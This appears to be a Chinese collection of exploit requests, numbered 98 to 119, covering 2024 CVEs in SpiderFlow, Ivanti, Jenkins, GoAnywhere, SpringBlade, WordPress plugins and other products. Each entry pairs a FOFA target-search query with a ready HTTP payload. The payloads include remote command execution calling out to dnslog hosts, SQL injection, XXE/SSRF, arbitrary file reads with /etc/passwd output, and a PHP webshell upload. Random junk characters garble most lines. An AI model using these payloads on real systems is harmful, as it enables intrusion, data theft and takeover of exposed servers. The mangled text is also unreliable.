CVE-2024-01954 O6 W" ]. r0 {% i+ _
FOFA:app="SpiderFlow"; c/ M4 X ~( ~' y" W
POST /function/save HTTP/1.1& I0 {; y: e" b
Host: 192.168.40.130:8088
7 X5 Y9 W& [: D( [9 z3 ?9 P7 g/ DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0! e0 H5 Y4 h1 }( U, y: l( e5 |
Connection: close
8 a9 V3 J+ x. O7 \Content-Length: 121$ C' l% `& {5 s" b2 W
Accept: */*
0 b7 y7 n- u! X5 OAccept-Encoding: gzip, deflate& j% J& B9 \) d9 d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) z; I) j/ l- R4 j
Content-Type: application/x-www-form-urlencoded; charset=UTF-8/ H) S4 F4 D/ S
X-Requested-With: XMLHttpRequest
# n1 R) [$ H5 `# H& l
& I- V0 ]; j3 \7 ?7 l" Eid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B. |" d3 y; v) V
* K g, F- H/ b m$ ]$ Q S0 U
99. Ncast盈可视高清智能录播系统busiFacade RCE% `% G) H; T# ~; r
CVE-2024-0305
! o" p- q( R) y1 K6 i0 I8 cFOFA:app="Ncast-产品" && title=="高清智能录播系统"
. ~/ I1 u& b; V+ v" gPOST /classes/common/busiFacade.php HTTP/1.1
! ]9 d3 @; I6 [) u3 x O. QHost: 192.168.40.130:8080
: O0 W6 [+ r$ \ i3 `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
; ~4 J% s7 T3 G& X2 }& @3 _& SConnection: close8 K6 N$ C- D9 t/ i& Q
Content-Length: 154
# R# S* c' w8 ?% `Accept: */*! H( k" J+ R4 g+ I/ ]
Accept-Encoding: gzip, deflate
$ K; q$ ?7 x9 v) Y: K/ A. w3 X, r7 P' KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, h- d7 ~5 c eContent-Type: application/x-www-form-urlencoded; charset=UTF-8# @& B. H; T8 {7 f9 [
X-Requested-With: XMLHttpRequest
1 n9 R, [' E A* }# P6 |0 q
W" U+ Q+ R! h i%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
* p% ]2 L% E9 [& H
! s! D( o( d+ i
: K; Z' ~2 g. H, W# X) M100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
3 E" w4 }, k; rCVE-2024-0352
, `) t T0 S* `FOFA:icon_hash="874152924"
% y5 |5 ^/ ^% f2 E- vPOST /api/file/formimage HTTP/1.1
5 K' `. a. O" D. ?Host: 192.168.40.130/ C; p7 b6 b o/ U. \9 j
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
! l- i7 F6 ?5 N' s6 R3 w+ a t- Z4 eConnection: close( k+ L; j, o( j
Content-Length: 201' {9 S4 p" T o% b5 G
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
/ P# T, \. A- T1 L/ ZAccept-Encoding: gzip( N; b+ o/ g: M4 d" ?5 R. A
" F, Y5 `- }. x4 R------WebKitFormBoundarygcflwtei
9 d* b. T4 Z5 s2 m3 fContent-Disposition: form-data; name="file";filename="IE4MGP.php"
: q9 l0 _6 a& z# G; C! `$ n, r$ p x9 TContent-Type: application/x-php
' |0 k C" |, F; b1 Y
8 N, q2 @3 n+ ]2ayyhRXiAsKXL8olvF5s4qqyI2O
. F! p y& H" J; @& e! q0 e------WebKitFormBoundarygcflwtei--5 z: ^% a Z6 E; E$ A6 O: t
$ P2 d/ _- E" b5 v" Y
5 d/ a J, ], J' D% T ^101. ivanti policy secure-22.6命令注入6 ]6 l8 q: Y! g2 @8 W
CVE-2024-21887! n; h7 `; s: A. \1 Z; T4 J, |
FOFA:body="welcome.cgi?p=logo"* d. B G; Z; y0 s% F
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1' _6 ]0 s- E+ X G! V
Host: x.x.x.xx.x.x.x
0 Z% B* f' }7 a# r* \- K$ LUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.369 W7 D5 ?+ k" i- n& F
Connection: close! w! O2 D- W; M. }( h4 N
Accept-Encoding: gzip$ b. ^7 t& b f0 R8 g
( u! [* x! l0 E2 b7 S# m% B) s( L& X6 r3 G2 D$ I/ [4 @( Y, Z
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
- t4 k, {) d* t0 p( s% FCVE-2024-21893
+ `; _2 T6 l) t ^' w- k$ zFOFA:body="welcome.cgi?p=logo"
9 t* `- o8 _, O* @& f- H, d' fPOST /dana-ws/saml20.ws HTTP/1.1
# O$ t, I4 ]6 C& r6 T4 xHost: x.x.x.x. b, g8 r2 o# l" B- m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
5 P/ d; w {3 O" B$ b4 NConnection: close1 p8 c, M# v+ j# T2 s# l! N% U
Content-Length: 792. m% @ o: ~4 f
Accept-Encoding: gzip
9 G: \' q" L- A# k0 q. \1 o+ O) Z+ D, }, R
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>/ R0 r7 r Y C
: J7 W$ y' ]0 D# s: d# F
103. Ivanti Pulse Connect Secure VPN XXE# q% }- F# f# F j, j- e
CVE-2024-22024! {: i; H/ X j$ u; q5 @- R0 O+ y! `
FOFA:body="welcome.cgi?p=logo", x+ u3 O4 W1 |; }( ]
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
! O' R1 l9 h( e" y% g) lHost: 192.168.40.130:111
. B8 L3 b& S- J5 g, u& M( {( DUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
/ c& O; |) y% b! |8 lConnection: close. q D# c" f, u% |3 B. ~7 c) {7 n- x
Content-Length: 204: K1 {* @. s. N& v- N% R. s
Content-Type: application/x-www-form-urlencoded
: n* H; h- v% F% t* U z. JAccept-Encoding: gzip
+ r0 Z k3 n2 B, _
# D3 p$ _, ?6 |9 w/ r" C1 xSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
% r4 _3 ~0 Z- y
5 }% o) @6 F0 r; @! \3 Z( i% y( p
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下3 u5 B: |% ]: s4 m, U. A' f' S
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
( j3 t, `# C% Q4 i/ x6 D+ p% {1 k
7 r" O( u% Z, W F) n' X. _- Y3 Y0 }" _
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露& ]; v7 [3 s8 Y+ a4 G! n. m
CVE-2024-05693 l( C* X6 }4 k
FOFA:title="TOTOLINK"
! J: |) D+ {# NPOST /cgi-bin/cstecgi.cgi HTTP/1.15 e4 w5 y2 F0 A. @2 {1 E( d1 B
Host:192.168.0.1; O# H9 I8 G& L( V' S$ y
Content-Length:41; A3 `8 C* d5 v& b
Accept:application/json,text/javascript,*/*;q=0.01/ @/ d1 X$ B* r
X-Requested-with: XMLHttpRequest
+ T: F: E8 h5 O1 CUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
3 w; V) Y% z/ c- L; _0 s; B4 hContent-Type: application/x-www-form-urlencoded:charset=UTF-8
+ p6 g# h) J# q+ {5 r, L6 Q" iOrigin: http://192.168.0.10 ^" X4 L6 c/ E5 Y! o
Referer: http://192.168.0.1/advance/index.html?time=16711523805648 h; U" R. w! g
Accept-Encoding:gzip,deflate: Z0 R3 f" a$ K& ]- y7 U
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.70 ]& k. J0 m" `. N
Connection:close- T; F: T+ L# I# E
m. }4 C* u& b$ y; ]{
% I/ x* |. C' G Q9 A, q"topicurl":"getSysStatusCfg",
, l9 g& q/ P/ M8 W"token":""
1 E @: l8 p. @$ _: l' ]}
$ M9 }' n- n- F* E6 S9 c( {- X7 B
105. SpringBlade v3.2.0 export-user SQL 注入
3 q$ I! s! I! G1 j# a3 e( @FOFA:body="https://bladex.vip"# H# `2 b5 E' C+ R
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
7 F4 O; }5 ~+ K7 _! t5 Y3 s
/ I2 ]. V6 ~4 o' v" g& F0 {) M106. SpringBlade dict-biz/list SQL 注入
2 X) k: e8 u" j% e/ T5 rFOFA:body="Saber 将不能正常工作" X5 l; H* F6 U1 F5 H
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
0 u) `% U1 ^2 x9 ^Host: your-ip
0 l, B: T8 n$ K' s9 @7 l. IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! j9 ^" e. ?) [. SBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
8 T8 z% A. C2 E' \! _6 RAccept-Encoding: gzip, deflate4 q9 I4 Z* k' p1 c b
Accept-Language: zh-CN,zh;q=0.9' G7 e2 i) X) o& f- Q
Connection: close* h5 a' f/ s; k- q
3 s6 Y" S* m* h: @) n" i7 B; w4 d- Y$ [; t" ^' r# Q4 f1 _2 p
107. SpringBlade tenant/list SQL 注入. R0 H7 M. ~9 w2 c( v
FOFA:body="https://bladex.vip"; l+ [+ t8 b7 ]7 T' G$ V
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
9 x! x, F5 D- [Host: your-ip
) h6 P7 k6 A9 e* V% _! RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) n; l1 N( Z0 z7 ?$ a6 a
Blade-Auth:替换为自己的% X7 E1 z) J" _4 m t( i% E4 c
Connection: close
( O* U. k9 j k& h$ y9 n, W! f2 w5 [6 K$ `
# b% m+ v e U" x; ]; Q
108. D-Tale 3.9.0 SSRF6 H# C4 m9 A0 ?9 b" ?% V$ ^
CVE-2024-21642# _) k- Y- T: E5 m$ K
FOFA:"dtale/static/images/favicon.png"" B; b# S g4 @
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
) P3 ?: R8 z; R# u2 ~9 f. FHost: your-ip% O8 L4 x% p6 n% o1 z: U% e
Accept: application/json, text/plain, */*# ]4 h) H; r! J+ t) a7 D1 f5 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36* ^7 b: j* |2 h3 L: s [" @
Accept-Encoding: gzip, deflate
3 `. g, |4 ?" i3 i) G# SAccept-Language: zh-CN,zh;q=0.9,en;q=0.87 M+ |" F: E; m, y# ]' a
Connection: close
1 m+ X7 ~3 P! T1 A
6 l% I% H: M. ?
% Z' z5 O7 A+ [* A9 @109. Jenkins CLI 任意文件读取
. v2 @+ }& M# `& a2 uCVE-2024-23897: i2 `% J& R6 x$ M+ C/ F1 U/ }* c
FOFA:header="X-Jenkins"
6 z# e$ l* i# m5 d6 l; ePOST /cli?remoting=false HTTP/1.1! S. Q9 S* N1 m
Host:% o3 a ]! W7 V& G% @: G
Content-type: application/octet-stream
1 F9 @! C7 j' @- xSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e925 X1 m3 |9 }* g. l
Side: upload
1 X% ~9 I- V$ s' N6 P& C) OConnection: keep-alive' M" @" r, R5 M. R' Y8 y
Content-Length: 163
; |/ |, ~. n" L
0 @: l2 c7 ~5 @5 D# Zb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
8 a! R4 g1 a3 R: s& h0 V
% J% |/ @6 \$ A3 c. {5 {: S2 |( w) f) m# r
POST /cli?remoting=false HTTP/1.16 \- ?* X" Y" C x. d4 h
Host:8 r6 P- p. Q2 p8 X
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92+ I e; {' e% P
download
( v3 a0 F0 ?% ^# S3 d1 W- TContent-Type: application/x-www-form-urlencoded0 ^% q P( @. I
Content-Length: 0
3 K. v5 R4 E8 @
% e1 S$ }; W' X+ H9 p( w
) h/ u' w6 _: l5 ^+ S' _% q( m+ w$ _ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
# s3 x x8 i5 j; Y% U' m0 Bjava -jar jenkins-cli.jar help
. k: U6 x8 H f7 I4 v1 V) A[COMMAND]
. K# N Y, h8 s! N* bLists all the available commands or a detailed description of single command.! o! u+ h( r4 K3 p; X5 N. ~: ~9 t
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
+ N! S9 A) H4 j1 o4 L& B. h" X6 q% G' F* \5 f8 x) s0 i
; Q( x) U( s6 ^9 c0 p110. Goanywhere MFT 未授权创建管理员) I" a$ B8 ^' y2 [
CVE-2024-0204
+ r5 e! f% g- w2 b: y, uFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"4 c$ J7 k5 M, ]( L+ @
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1, q6 Z$ c+ E7 }' }9 d
Host: 192.168.40.130:8000* }; F" R" j9 c# I" T0 x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36# U* {+ j$ y$ ~- }4 Z) K5 R
Connection: close
4 h! P8 a1 c- T% Z+ G( JAccept: */*
( C. C. T9 T6 I2 y; ] EAccept-Language: en
0 D" R* K( ~; L: u4 PAccept-Encoding: gzip
7 V! A0 n9 V5 |1 Q5 _8 v( @) Q. W/ ]5 J. g5 ]
0 d% O- b& a. J' q1 p4 P0 ]
111. WordPress Plugin HTML5 Video Player SQL注入
6 }4 s r$ z: gCVE-2024-10615 }+ N7 F# P8 \
FOFA:"wordpress" && body="html5-video-player"# b4 ?; m; D" ~6 l
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
: }9 m/ c. f/ f s/ i2 XHost: 192.168.40.130:112# \- e" P. J8 z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36* ]: h& P9 f" q' v1 H
Connection: close' O! _# G7 w& i& B
Accept: */*% R; j7 T# b# [5 u
Accept-Language: en
0 p8 a7 B" @3 o0 I5 ]Accept-Encoding: gzip9 c n9 h( v6 y
& s: a$ Q9 n/ _6 j7 i, H
$ \. {# N( Y: `/ U1 \7 a p112. WordPress Plugin NotificationX SQL 注入
) P+ G+ [* a1 Q4 GCVE-2024-1698
) ^! l" {! G# l; W8 `* ZFOFA:body="/wp-content/plugins/notificationx"
" l: T3 Z' M( x tPOST /wp-json/notificationx/v1/analytics HTTP/1.16 B8 A6 I7 o# v" p6 w" w
Host: {{Hostname}}" C6 |4 ?7 V1 r. ^9 |" f
Content-Type: application/json8 j8 @ k/ F% Z2 b) W a
' Y1 _+ b; m+ x4 C: j$ s' v2 ?4 [: ~
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}3 n" s f4 \: G" \$ e* U
1 A$ Z! S: G5 U; Z( r+ A1 B
5 C1 z4 c5 Y3 K2 j6 X' y1 D
113. WordPress Automatic 插件任意文件下载和SSRF: g; f1 }& [ B
CVE-2024-27954( z# u- r1 \3 l v$ J5 b( r
FOFA:"/wp-content/plugins/wp-automatic"
- L. ^& l) _2 h! f$ t; n" KGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
( D5 _: w/ ?# d2 m DHost: x.x.x.x2 N, |( d3 A) y3 C0 u X+ y
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.365 ]8 j' H5 {0 v% Y+ R3 R
Connection: close4 {: A% P' q$ W" I
Accept: */*
3 d3 Y7 _. H5 L% W+ [. b3 ]! |" W& xAccept-Language: en" r8 f. ? `1 _# G: \- S- c& {4 U
Accept-Encoding: gzip
1 r* ^! v: {: p
/ p( V- N0 C# O9 d
. N; f& Q8 U- C4 [ e! }114. WordPress MasterStudy LMS插件 SQL注入9 \+ p- W( g! Y2 W* a) m( K1 O
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"# j* V" B( k: k: [1 \ w" l
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
5 Q$ x5 H4 Z! x6 \* GHost: your-ip9 y) G! A. y; U+ M, k/ s, }$ v
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.367 v. r' B. D! J7 F9 L. A. n
Accept-Charset: utf-8
7 F( u& n7 `) q6 i2 n s/ {' d# k2 hAccept-Encoding: gzip, deflate
0 J. a; z0 D9 W [5 AConnection: close
4 G/ o8 L1 d1 k2 {! g
. B- c9 C; C0 Q& p" n% U$ q R, T; }: n0 E& J
115. WordPress Bricks Builder <= 1.9.6 RCE p. _9 \- h8 l/ e4 C' j
CVE-2024-25600
" X/ U( J8 Y$ I* I- Y. HFOFA: body="/wp-content/themes/bricks/"# i8 J1 I4 ], T6 ]) t0 l* p/ A: J
第一步,获取网站的nonce值
1 L; W. |2 y( q& @GET / HTTP/1.16 G; q* S$ Y- @1 I7 l1 b
Host: x.x.x.x
! r- Y) `4 V* BUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36" f @2 `9 h Q t/ N3 G
Connection: close7 L! q1 u e( U z$ l; @; h- b- d
Accept-Encoding: gzip
0 o1 L( w4 [- U4 |5 f
( n! O% W4 b6 I4 K( r2 H; T) g
' M3 v6 p5 |- h8 J; J6 C6 V2 k1 A- H第二步替换nonce值,执行命令
/ M+ M* C( E, dPOST /wp-json/bricks/v1/render_element HTTP/1.1: j3 T. x C8 ]5 [9 S p
Host: x.x.x.x/ H5 y1 J% H7 y' J3 j$ B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
) C9 E, ~! U1 F6 y6 s% }* NConnection: close
) O* [* i" O1 S9 O) {- ^( wContent-Length: 3562 Q. ?# t! E* F! Z+ c6 j+ U4 }+ N
Content-Type: application/json
: S3 W( ^& w( z( hAccept-Encoding: gzip
: ^8 C, u# F7 t/ @ B4 v' F6 O: q% I
{8 E* s; n/ s2 p; U5 o. `- W2 h
"postId": "1",; ]6 s- n- I) L) p8 X; R
"nonce": "第一步获得的值",
& x$ m/ u. r( F& w "element": {
( N0 W/ ^+ P, l G( d; ] "name": "container",9 ]+ }' i8 M3 B0 d
"settings": {
' t, e- R/ S6 ~4 i6 \+ V) E "hasLoop": "true",$ \5 C7 ^, l! p6 Z; |3 @6 C
"query": {
! c6 k4 S% f7 ^' N; o "useQueryEditor": true,
$ g1 `: j1 p0 ~ "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
% M) B( u1 C7 _, y5 Y2 e "objectType": "post" C/ I2 y+ ]1 K$ T. Z6 u( Q
}# r( X) p/ I3 X1 p6 d2 Q$ q
}
' @3 V6 v: j' `0 Y }7 x' N7 k+ k+ T1 b. M
}
/ b$ z4 }( Z8 U7 b% {: [& b( ?- |9 Y) e+ K! W* e& \
! b% \3 @- X( O+ Y; W
116. wordpress js-support-ticket文件上传
8 P( k9 A* [4 I% k' tFOFA:body="wp-content/plugins/js-support-ticket"
) e$ Y: W- j! Z1 W4 C1 ^POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
. y& V6 S5 {7 U& s FHost:
" `# z, n$ G5 G0 W9 CContent-Type: multipart/form-data; boundary=--------7670991719 T, T% [( Z4 c& L
User-Agent: Mozilla/5.0
- B3 c( A$ s" J% j. b
, ?1 K( v l5 `8 P$ A* O6 s. y----------767099171
3 x$ v7 e: |9 q7 Y+ L dContent-Disposition: form-data; name="action"" D- g2 h" x5 b; U8 U
configuration_saveconfiguration5 L1 u+ q+ H- }: q3 N+ ]
----------767099171; ?; k; y' A4 x, Y
Content-Disposition: form-data; name="form_request"7 D4 i* u, y' P. H1 _+ e) n
jssupportticket" W% Y( l. ?& N7 c( ^1 V1 E" V
----------767099171/ P. ^' z7 X* G+ ]+ s: ?
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"7 R7 A' Z2 `4 v3 R) C/ b
Content-Type: image/png
4 \5 y9 r. K7 E# n----------767099171--; X2 P E! O' ] ]2 T! @
# T3 B# l3 g2 L/ u7 H' c7 H
$ G$ Z, G' F4 B3 ~ l117. WordPress LayerSlider插件SQL注入1 J) |# ^/ y( ~7 P/ k& Z6 L
version:7.9.11 – 7.10.0* @* Z, K @0 ?5 V/ {$ l& U) ?
FOFA:body="/wp-content/plugins/LayerSlider/") @" S1 G9 H, A7 b& R: K$ X' E) i- @* E
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
# s* G* }$ D, v( M. a% z1 Z2 jHost: your-ip" G# I: y* [+ F% U2 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0$ N) E3 c, r% u, p& B, w* g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' w4 L' C6 v% ?" P. JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) b+ Q% L2 d2 B2 o: jAccept-Encoding: gzip, deflate, br# O8 }: x5 P; x5 Y' J5 M0 l, k
Connection: close
$ W/ f' ~% e" }' S8 hUpgrade-Insecure-Requests: 1! ?! k# `, ~6 l7 t& H
% A+ |1 F; x- x* @& ]# S; z# `- O. G w ]
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
; W: R% ^- G' @CVE-2024-0939: K" G. c. P2 S/ b" {- S: x/ m# @
FOFA:title="Smart管理平台"
, h0 Q- `" P# R( _/ BPOST /Tool/uploadfile.php? HTTP/1.1
0 G; Q7 L$ U6 mHost: 192.168.40.130:8443. y( z6 n S+ j* f6 a; h0 ^
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f85 x& z F; t3 j. n0 [. ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0) F4 t5 _2 k4 P) j# X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 C# f' X- m, I; L# e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& w9 y5 d# w0 J
Accept-Encoding: gzip, deflate
5 W4 r4 m9 M: [0 jContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
# A0 X; I& s: r* Q1 M# VContent-Length: 405! ]7 |& ~3 m. A5 S5 V5 L
Origin: https://192.168.40.130:8443
_# K0 r7 K$ E. a. ~Referer: https://192.168.40.130:8443/Tool/uploadfile.php
2 }6 b0 y- @# WUpgrade-Insecure-Requests: 1
! N6 x5 ]; n; v3 p$ U7 QSec-Fetch-Dest: document. Y( X3 K6 v& Z+ A5 E, l- u
Sec-Fetch-Mode: navigate
0 f: J1 N u! t* b C& u- G# K2 j; uSec-Fetch-Site: same-origin o& k- P E/ A
Sec-Fetch-User: ?1
% V& `& o0 S p; m1 W& MTe: trailers. n+ o5 T* L8 i7 ^9 g5 n
Connection: close/ ~: Z9 x N9 D+ t, R
: d+ [' |( x+ y3 y-----------------------------13979701222747646634037182887! j; U0 o0 S6 U5 c' e8 S
Content-Disposition: form-data; name="file_upload"; filename="contents.php"8 `8 _% Y$ w, U* O$ h5 I$ V% C, g+ S
Content-Type: application/octet-stream; ]" N7 _# L( U# |2 v" z+ o8 A# m
( h+ H% ?8 f, r) u1 W( U<?php
W* H9 k' v. U6 o/ _9 Osystem($_POST["passwd"]);
' r+ d1 A2 D8 j, q2 L?>. b4 S9 S0 Q- Q a0 y9 M0 ^
-----------------------------13979701222747646634037182887% _- }. [ X1 c) |# c8 m, n
Content-Disposition: form-data; name="txt_path"
* m a( U& w( l7 S
6 u. P, c; A/ j* x/home/src.php! P/ h+ d( E: \9 l2 z! [
-----------------------------13979701222747646634037182887--% i- k; [! Z" ^3 @/ X* ]3 b1 f
- O. r! A; a; ?, F, ?( W) ^* a# U% t8 G6 b, B2 q( w+ H% a5 M
访问/home/src.php7 F; X$ f/ @/ t
4 N9 }- q( ?' E- `5 Y) R( V0 _7 {119. 北京百绰智能S20后台sysmanageajax.php sql注入" ], k5 {* C9 x( ^
CVE-2024-1254: c/ g, h# T. [3 N! ]& |" K
FOFA:title="Smart管理平台"- q" m V! K: w! S8 U0 a
先登录进入系统,默认账号密码为admin/admin
* u( n' @2 d. T( b1 j2 o2 KPOST /sysmanage/sysmanageajax.php HTTP/1.11( \ L4 H) X `; t; y3 }; m# E
Host: x.x.x.x+ ]# L$ B" f$ {$ }' S
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee, T3 [1 ~# x6 D' i+ m8 S, [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0! c8 I8 j/ Q9 T) Q6 H" H- k
Accept: */*: o. Z7 o- U2 [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. @, H ^4 B& F( `7 b2 `7 c
Accept-Encoding: gzip, deflate. L& r* H: ^2 X+ b3 S
Content-Type: application/x-www-form-urlencoded;" o+ s+ l" l" _7 {7 o, {
Content-Length: 1096 I- Q* L6 d) G0 J
Origin: https://58.18.133.60:8443
$ Z" I( Q' ^- v; U* N! OReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php% H+ _. { [2 J! {4 |# J
Sec-Fetch-Dest: empty
) |! }; |& D0 H4 I7 U y5 uSec-Fetch-Mode: cors! Y5 n: ] P* | K/ q
Sec-Fetch-Site: same-origin
